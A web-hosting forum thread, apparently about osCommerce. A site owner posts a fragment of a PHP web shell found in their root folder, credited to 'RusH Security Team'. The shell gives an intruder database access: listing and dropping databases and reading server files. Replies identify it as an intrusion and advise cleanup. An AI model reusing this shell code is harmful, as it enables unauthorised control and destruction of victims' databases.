 $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>");
  print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
          "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>".
          "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";

 print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>".
       "---[ <a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ Ú‡·Îˈ\"><b>$db</b></a>".
       " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";

 while ( $row=mysql_fetch_array($result) ){
   //ÔÓÎÛ˜‡ÂÏ ÍÓ΢ÂÒÚ‚Ó ÒÚÓÍ(Á‡ÔËÒÂÈ) ‚ Ú‡·ÎˈÂ
   $count=mysql_query ("SELECT COUNT(*) FROM $row[0]");
   $count_row= mysql_fetch_array($count);
   print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>".
         "<tr><td bgcolor=#DBDCDD>";
   if ($count_row[0] < 1) { 
      print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a> ($count_row[0])</td></tr></table>";  
   }else{
       print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a> ($count_row[0])</td></tr></table>";  
   }
   @mysql_free_result($count);
 }
} 

/*---------------------- END L E F T   B L O C K (menu bd)! -------------------*/

print "
  </td>
  <td valign=top bgcolor=#E6E7E9>";

/*------------------------ R I G H T   B L O C K ! -----------------------*/
if ($connection&&!isset($db)) { 
$anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection); 
if (mysql_num_rows($anon)>0) { print "<table align=center><tr><td><b>¬ÌËχÌËÂ!<b></td></tr><tr><td bgcolor=red>¿ÌÓÌËÏÌ˚Ï ÔÓθÁÓ‚‡ÚÂÎˇÏ ‡Á¯ÂÌÓ ÔÓ‰Íβ˜ÂÌËÂ Í ÒÂ‚ÂÛ MySQL</td></tr></table>"; }
print $form_ad_b; 
}
/*-------------œÓˆÂÒÒ˚ MySql------------*/
if (isset($proc) && $proc=="TRUE"){
$result = mysql_query("SHOW PROCESSLIST", $connection); 
print "<center><font size=2>œÓˆÂÒÒ˚ MySQL ÒÂ‚Â‡ [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
  print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>";  
} 
 print "</table><br>";
mysql_free_result($result);
unset($proc);
}

/*—ÓÁ‰‡ÂÏ ÌÓ‚Û˛ ·‡ÁÛ*/
if (isset($HTTP_GET_VARS['new_db'])){
   $new_db=trim($HTTP_GET_VARS['new_db']);
   if (mysql_create_db ($new_db)) {
       print ("<center><font size=2>¡‡Á‡ <b>$new_db</b> ÛÒÔ¯ÌÓ ÒÓÁ‰‡Ì‡</font></center><br>");
       print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
   } else {
       print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
   }
   unset($new_db);
}

/*”‰‡ÎÂÌË ·‡Á˚*/
if (isset($HTTP_GET_VARS['drop'])){
    $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>");
    while ( $row_d=mysql_fetch_row($result_d) ){
       if ($drop==$row_d[0]) $dr="TRUE";
    }
if ($dr="TRUE") { 
mysql_drop_db($drop,$connection);
print ("<center><font size=2>¡‡Á‡ <b>$drop</b> ÛÒÔ¯ÌÓ Û‰‡ÎÂ̇</font></center><br>");
print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
}
unset($drop);
}

/*-------------◊ËÚ‡ÂÏ ÔÓËÁ‚ÓθÌ˚È Ù‡ÈÎ ÒÂ‚Â‡-----------*/
if (isset($f)){
print $form_file;
}
...........removed long code............


</table>

</td></tr>
<tr><td>
<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td align=center>
               free script ©RusH Security Team 
           </td>
        </tr>
     </table> 
</td></tr>
</table>
</td></tr></table>";

?>




Link to comment
Share on other sites

John,

 

It is a hacker file. Delete it.

 

 

 

 

Chris

 

I deleted it as soon as i found it, thankfully! I don't understand how it managed to get there though? How do they do it?! On my root folder! I had a recent hack with permissions on 777, but i wouldn't know where to start with finding the cause of this one. :(

Link to comment
Share on other sites

That shell code above seems quite focussed on database access so best you take some time to take a look at your database as well. There will also be other files on your site that have had scripts injected into them that allow for files to be uploaded. These can take many forms so if you get a chance have a read of the two discussions in my signature which cover what some of those methods are, and how in some situations, file and directory permissions are of no consequence to preventing this type of intrusion.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...